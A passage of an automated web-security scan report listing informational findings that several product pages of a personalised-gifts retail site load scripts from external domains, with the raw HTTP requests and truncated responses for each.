<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/datasource-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/connection-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/animation-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete//json-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/autocomplete-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</script>
   <script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...

19.20. http://www.personalcreations.com/personalized-anniversary-gifts-PANNBSL

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.personalcreations.com
Path:   /personalized-anniversary-gifts-PANNBSL

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /personalized-anniversary-gifts-PANNBSL HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:19:35 PM?0&9/3/2011 6:19:10 PM?0&9/3/2011 6:19:46 PM?0&9/3/2011 6:19:48 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:19:48 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:19:48 GMT
Connection: close
Content-Length: 381211

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...
<head id="productSelectionHead"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js"></script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.08.31.1"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/floristexpresspopupscript.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
<!-- BEGIN PIR 103147 Suppress View Other Brands for MyPoints Ref 11/5 FS -->
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
<!-- END PIR 103147 Suppress View Other Brands for MyPoints Ref 11/5 FS -->


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div> <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div>

       <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-dom-event.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/get-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/datasource-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/connection-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/animation-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete//json-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/autocomplete-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</script>
   <script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...

19.21. http://www.personalcreations.com/personalized-back-to-school-gifts-PBKDB2S

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.personalcreations.com
Path:   /personalized-back-to-school-gifts-PBKDB2S

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /personalized-back-to-school-gifts-PBKDB2S HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:18:53 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:19:49 PM?0&9/3/2011 6:19:56 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:19:56 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:19:56 GMT
Connection: close
Content-Length: 259186

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...
<head id="productSelectionHead"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js"></script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.08.31.1"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/floristexpresspopupscript.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
<!-- BEGIN PIR 103147 Suppress View Other Brands for MyPoints Ref 11/5 FS -->
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
<!-- END PIR 103147 Suppress View Other Brands for MyPoints Ref 11/5 FS -->


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div> <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div>

       <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-dom-event.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/get-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/datasource-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/connection-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/animation-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete//json-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/autocomplete-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</script>
   <script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...

19.22. http://www.personalcreations.com/personalized-birthday-gifts-PBIRBSL

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.personalcreations.com
Path:   /personalized-birthday-gifts-PBIRBSL

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /personalized-birthday-gifts-PBIRBSL HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:18:53 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:19:13 PM?0&9/3/2011 6:20:03 PM?0&9/3/2011 6:19:51 PM?0&9/3/2011 6:19:27 PM?0&9/3/2011 6:19:46 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:19:46 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:19:46 GMT
Connection: close
Content-Length: 411135

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...
<head id="productSelectionHead"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js"></script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.08.31.1"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/floristexpresspopupscript.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
<!-- BEGIN PIR 103147 Suppress View Other Brands for MyPoints Ref 11/5 FS -->
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
<!-- END PIR 103147 Suppress View Other Brands for MyPoints Ref 11/5 FS -->


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div> <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div>

       <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-dom-event.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/get-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/datasource-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/connection-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/animation-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete//json-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/autocomplete-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</script>
   <script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...

19.23. http://www.personalcreations.com/personalized-birthday-gifts-her-PHERBIR

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.personalcreations.com
Path:   /personalized-birthday-gifts-her-PHERBIR

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /personalized-birthday-gifts-her-PHERBIR HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=?0&9/3/2011 6:23:53 PM?0&9/3/2011 6:24:05 PM?0&9/3/2011 6:24:33 PM?0&9/3/2011 6:25:01 PM?0&9/3/2011 6:24:49 PM?0&9/3/2011 6:25:00 PM?0&9/3/2011 6:25:19 PM?0&9/3/2011 6:26:43 PM?0&9/3/2011 6:26:58 PM?0&9/3/2011 6:27:20 PM?0&9/3/2011 6:27:30 PM?0&9/3/2011 6:27:56 PM?0&9/3/2011 6:27:14 PM?0&9/3/2011 6:27:54 PM?0&9/3/2011 6:28:09 PM?0&9/3/2011 6:28:10 PM?0&9/3/2011 6:29:21 PM?0&9/3/2011 6:29:12 PM?0&9/3/2011 6:29:04 PM?0&9/3/2011 6:29:29 PM?0&9/3/2011 6:29:35 PM?0&9/3/2011 6:30:11 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:30:11 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:30:12 GMT
Connection: close
Content-Length: 318870

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...
<head id="productSelectionHead"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js"></script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.08.31.1"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/floristexpresspopupscript.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
<!-- BEGIN PIR 103147 Suppress View Other Brands for MyPoints Ref 11/5 FS -->
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
<!-- END PIR 103147 Suppress View Other Brands for MyPoints Ref 11/5 FS -->


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div> <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div>

       <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-dom-event.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/get-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/datasource-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/connection-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/animation-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete//json-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/autocomplete-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</script>
   <script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...

19.24. http://www.personalcreations.com/personalized-business-gifts-PBIZGFT

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.personalcreations.com
Path:   /personalized-business-gifts-PBIZGFT

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /personalized-business-gifts-PBIZGFT HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:19:35 PM?0&9/3/2011 6:19:10 PM?0&9/3/2011 6:19:46 PM?0&9/3/2011 6:19:48 PM?0&9/3/2011 6:20:47 PM?0&9/3/2011 6:20:37 PM?0&9/3/2011 6:20:23 PM?0&9/3/2011 6:20:48 PM?0&9/3/2011 6:20:46 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:20:46 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:20:45 GMT
Connection: close
Content-Length: 189636

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...
<head id="productSelectionHead"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js"></script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.08.31.1"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/floristexpresspopupscript.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
<!-- BEGIN PIR 103147 Suppress View Other Brands for MyPoints Ref 11/5 FS -->
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
